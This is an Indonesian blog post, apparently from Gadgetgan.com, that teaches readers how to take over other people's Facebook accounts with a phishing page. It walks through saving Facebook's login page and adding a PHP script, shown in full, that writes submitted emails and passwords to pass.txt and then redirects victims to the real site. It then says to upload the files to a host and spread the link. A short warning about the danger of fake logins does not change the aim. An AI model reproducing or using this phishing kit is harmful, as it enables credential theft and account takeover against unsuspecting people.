Cara Hack Facebook Orang Menggunakan Halaman Login Palsu

Gadgetgan.com – Facebook merupakan sebuah sosial media yang sedang booming dari waktu ke waktu tidak padam ditelan masa, meskipun sudah banyak developer lain yang membuat beragam aplikasi sosial media, namun facebook tetap tidak kehilangan pamornya di kalangan kawala muda umumnya.

Namun, tahukah anda bahwa kita dapat melakukan hacking pada akun facebook orang lain. Ya, kita dapat menghack facebook orang lain dengan banyak cara. Salah satu cara yang cukup populer dilakukan adalah dengan membuat login Facebook palsu.

Ada banyak cara yang bisa dilakukan, agar anda tidak salah dalam hal ini, berikut tuntunan yang bisa kami berikan untuk menghack facebook orang lain dengan menggunakan halaman login palsu.

Sebelumnya, anda perlu memperhatikan dahulu bahwa login palsu ini membahayakan, jika membuat tampilan login Facebook palu, maka hacker bisa mengalihkan data yang anda masukkan ke hosting file yang mereka miliki. Dari situlah akan ada data email serta password Facebook anda yang tersimpan, sehingga hacker dapat masuk dengan mudah.

Jika sudah mengetahui bagaimana bahaya dari login palsu ini maka selanjutnya kita akan beralih ke cara hack akun facebook dengan login palsu. Mau tahu bagaimana caranya? Beginilah caranya :

1. Buka halaman http://www.facebook.com/login.php/, kemudian simpanlah halamannya, caranya adalah dengan mengklik kanan lalu pilih Save as.

2. Setelah didownload halaman yang tadi, maka hasil downloadnya akan tersimpan dalam file Masuk Facebook_Facebook.html dan folder Masuk Facebook_Facebook_files. Setelah itu anda timpa file Masuk Facebook_Facebook_files dengan file yang sama yang sudah diperbarui.

3. Kemudian, anda membuat file next.php. Isi dalam file tersebut, bisa anda copy paste berikut :

<?php
header(‘Location: http://www.Facebook.com/login.php’);
$handle = fopen(‘pass.txt’, ‘a’);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, ‘=’);
fwrite($handle, $value);
fwrite($handle, ‘\n’);
}
fwrite($handle, ‘\n’);
fclose($handle);
exit;
?>

4. Setelah selesai, anda buatlah file kosong dengan Notepad, berilah nama Pass.txt. File tersebut gunanya untuk dapat menampung email serta password Facebook orang lain yang akan dihack tersebut.

5. Usai semua file disiapkan, langkah selanjutnya adalah mengupload semua file tersebut ke layanan file hosting yang anda miliki. Isi file yang harus diupload adalah Masuk Facebook _ Facebook_files, file Masuk Facebook _ Facebook.html yang kamu download, next.php dan Pass.text.

6. Setelah itu sebarlah link login Facebook palsu yang anda buat tadi.

Sponsored Links